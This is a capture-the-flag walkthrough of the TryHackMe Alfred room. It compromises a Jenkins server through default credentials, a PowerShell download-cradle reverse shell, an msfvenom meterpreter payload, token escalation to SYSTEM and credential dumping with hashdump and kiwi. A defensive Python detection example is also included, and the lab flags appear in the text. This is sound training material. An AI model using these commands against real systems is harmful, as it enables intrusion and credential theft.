TL;DR Walkthrough of the TryHackMe Alfred room.
THM Walkthroughs:
A full list of our TryHackMe walkthroughs and cheatsheets is here.
Background
CISM is thankfully done and we are back on TryHackMe and studying for a hands-on exam. The hands-on cert is Windows heavy, so we are brushing up. This is just a standard practice room on TryHackMe, but it was good practice with command injection, reverse shells, msfvenom payloads, and Meterpreter. It also used Jenkins, which I hadn’t seen since CRTP, so that was interesting.
Task 1
How many ports are open? (TCP only)
sudo nmap -Pn -sV -O 10.10.175.71
3
What is the username and password for the login panel? (in the format username:password)
The Jenkins default is admin:password, but THM’s answer box lets us know both the username and password are five characters each based on the asterisks. Hence I tried admin:admin and got lucky.
admin:admin
Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it: powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
You first need to download the Powershell script and make it available for the server to download. You can do this by creating an http server with python: python3 -m http.server
No answer needed
What is the user.txt flag?
I had used Invoke-PowerShellTcp.ps1 before in the CRTP course and exam, but I believe this is the first time I’d seen it suggested on TryHackMe. If you don’t already have it loaded on your Kali it’s available here.
Once you have downloaded and unzipped the PS1s just change to the directory and host it via Python’s simple HTTP server.
cd /home/kali/Downloads/exploits/nishang-master/Shells
python3 -m http.server 8080
Open a new tab in the terminal and start a simple netcat listener.
netcat -lvp 4444
My Kali IP is 10.8.201.25; obviously do an 'ifconfig' and check yours. TryHackMe helpfully provides the command syntax. There’s an RCE feature in the build options on the Jenkins portal (a build step that runs an arbitrary command). We can abuse this to send ourselves a shell as the user who is running Jenkins.
powershell iex (New-Object Net.WebClient).DownloadString('http://10.8.201.25:8080/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.8.201.25 -Port 4444
Hit ‘Build Now’ in Jenkins and as long as you input everything correctly you will see the tab running the Python HTTP server show a file download and shortly afterwards you will have shell access in the tab running netcat.
whoami /groups
Get-Content C:\Users\bruce\Desktop\user.txt
We get the user flag.
79007a09481963edf2e1321abd9ae2a0
Leave those tabs open!
THM’s VM was rather janky. Normally at this point I’d enable WinRM, create a new local admin with a known password, and evil-winrm into the thing. However this particular VM didn’t want to work with WinRM or RDP. Maybe THM was trying to force us to follow their steps, or maybe the VM is just running on the proverbial hope and a prayer. Who knows.
Task 2
We can get a better shell by hosting a msfvenom payload via the simple HTTP server we are already running and then running it from that initial reverse shell. One just has to open two more terminal tabs in Kali: one to generate the payload and one to run Metasploit and catch the shell.
I simply put the msfvenom payload in the directory that I was already hosting.
cd /home/kali/Downloads/exploits/nishang-master/Shells
msfvenom -p windows/meterpreter/reverse_tcp -a x86 -e x86/shikata_ga_nai LHOST=10.8.201.25 LPORT=5555 -f exe -o MyReverseShell.exe
What is the final size of the exe payload that you generated?
73802 bytes
Task 3
View all the privileges using whoami /priv
No answer needed
You can see that two privileges (SeDebugPrivilege, SeImpersonatePrivilege) are enabled. Let’s use the incognito module that will allow us to exploit this vulnerability.
Enter: load incognito to load the incognito module in Metasploit. Please note that you may need to use the use incognito command if the previous command doesn’t work. Also, ensure that your Metasploit is up to date.
No answer needed
To check which tokens are available, enter list_tokens -g. We can see that the BUILTIN\Administrators token is available.
Use the impersonate_token "BUILTIN\Administrators" command to impersonate the Administrators’ token. What is the output when you run the getuid command?
I will run through how to do all of Task 3 in the last question regarding the root flag. The answer here though is simply:
NT AUTHORITY\SYSTEM
Even though you have a higher privileged token, you may not have the permissions of a privileged user (this is due to the way Windows handles permissions — it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do).
Ensure that you migrate to a process with correct permissions (the above question’s answer). The safest process to pick is the services.exe process. First, use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS.
No answer needed
Read the root.txt file located at C:\Windows\System32\config
Remember back in Task 1 when I said "don’t close that shell yet!"? This is why: simply use that shell to grab and execute the msfvenom payload we created in Task 2.
Open a new tab in Kali and start a Metasploit listener.
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 5555
set LHOST 10.8.201.25
run
Then in the shell on THM’s VM run the payload.
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.8.201.25:8080/MyReverseShell.exe','MyReverseShell.exe')"
Start-Process ".\MyReverseShell.exe"
Nice, we get a Meterpreter session. Let’s run as system, list processes, migrate to the services.exe PID, and read the root flag. TryHackMe helpfully let us know where it was located.
getsystem
ps
migrate 668
cat C:/Windows/System32/config/root.txt
dff0f748678f280250f25a45b8046b4a
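A defender's view of the two download chains used in this room (the Task 1 Invoke-PowerShellTcp cradle launched from a Jenkins build step, and the Task 3 WebClient download of the msfvenom executable), as an added example that is not part of the original walkthrough: Python detection logic run over constructed process-creation events in an assumed Sysmon/4688-style field layout. It scores a Jenkins-spawned shell, a WebClient download cradle and nishang-style reverse-shell arguments separately, so an ordinary build step that merely runs PowerShell does not alert on its own.

```python
import re
from typing import Dict, List

# Constructed process-creation events mirroring this room's two chains.
# Field names are an assumption of this example, not a real product schema.
EVENTS = [
    {"pid": 3360, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Java\jre\bin\java.exe",
     "command_line": "cmd /c powershell iex (New-Object Net.WebClient).DownloadString('http://10.8.201.25:8080/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.8.201.25 -Port 4444"},
    {"pid": 3372, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "powershell \"(New-Object System.Net.WebClient).Downloadfile('http://10.8.201.25:8080/MyReverseShell.exe','MyReverseShell.exe')\""},
    {"pid": 3400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Java\jre\bin\java.exe",
     "command_line": r"powershell -File C:\jenkins\scripts\build.ps1"},   # a benign build step
    {"pid": 3412, "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe", "command_line": "C:\\Windows\\explorer.exe"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# PowerShell method names are case-insensitive ("Downloadfile" runs fine), so match that way too.
CRADLE = re.compile(r"Net\.WebClient\)\.Download(String|File|Data)\s*\(", re.IGNORECASE)
EXEC = re.compile(r"\biex\b|Invoke-Expression|Start-Process", re.IGNORECASE)
REVERSE_ARGS = re.compile(r"-Reverse\b.*-IPAddress\b.*-Port\b", re.IGNORECASE)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(event: Dict[str, str]) -> List[str]:
    """Return the indicator names that fire for one process-creation event."""
    hits, cmd = [], event["command_line"]
    if basename(event["parent_image"]) == "java.exe" and basename(event["image"]) in SHELLS:
        hits.append("jenkins_spawned_shell")        # Jenkins (java.exe) running an OS shell
    if CRADLE.search(cmd):
        hits.append("webclient_download_cradle")
        if EXEC.search(cmd):
            hits.append("download_and_execute")     # fetch and run in one command line
    if REVERSE_ARGS.search(cmd):
        hits.append("reverse_shell_arguments")      # nishang Invoke-PowerShellTcp switches
    return hits

def severity(hits: List[str]) -> str:
    if "download_and_execute" in hits or "reverse_shell_arguments" in hits:
        return "high"
    if "webclient_download_cradle" in hits:
        return "medium"
    return "low" if "jenkins_spawned_shell" in hits else "none"  # low: correlate, do not page

def triage(events: List[Dict[str, str]]) -> Dict[int, tuple]:
    """Map each PID to (severity, indicators) for the whole event batch."""
    results = {}
    for e in events:
        hits = classify(e)
        results[e["pid"]] = (severity(hits), hits)
    return results
```

The low-severity branch is the important caveat: Jenkins legitimately spawns cmd.exe and powershell.exe for every Windows batch or PowerShell build step, so the parent/child relationship alone is context for correlation, not an alert.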
On a side note though, let’s pretend that THM didn’t tell us where the root.txt file was located. We can search the entire system with:
search -f root.txt
Or if we at least know it’s in C:\Windows\System32:
search -d C:\\Windows\\System32 -f root.txt
Lastly, it’s rarely a bad habit to dump creds from any system you get into.
run post/windows/gather/hashdump
An alternate method is to use Meterpreter’s built-in kiwi module. It can dump the SAM, LSASS, etc.
load kiwi
lsa_dump_sam
Summary
That’s it for this room. Even if it wasn’t anything new, it was still good practice.
References
PowerShell reverse shells: https://www.hackingarticles.in/powershell-for-pentester-windows-reverse-shell/
Find files using Meterpreter: https://www.offsec.com/metasploit-unleashed/searching-content/
Hashdump in Meterpreter: https://www.offsec.com/metasploit-unleashed/windows-post-gather-modules/